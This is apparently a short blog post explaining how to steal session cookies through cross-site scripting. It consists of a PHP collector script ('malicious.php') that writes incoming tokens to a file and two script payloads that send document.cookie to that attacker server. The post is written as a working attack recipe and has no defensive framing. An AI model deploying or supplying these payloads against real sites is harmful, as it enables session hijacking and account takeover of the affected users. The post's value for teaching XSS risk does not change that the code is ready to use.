There are two parts:
1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.
Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"
$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);
As you can see, all the server code is take in a $_GET request, and writes the attribute 'code' from the $_GET request variable.
Part 2:
In a server that is vulnerable to XSS, input the following malicious code:
<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>
or
<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>
The following code creates an image with the source pointing to our malicious server. The request populates the GET variable "code" which the server is expecting to read and write.
No comments:
Post a Comment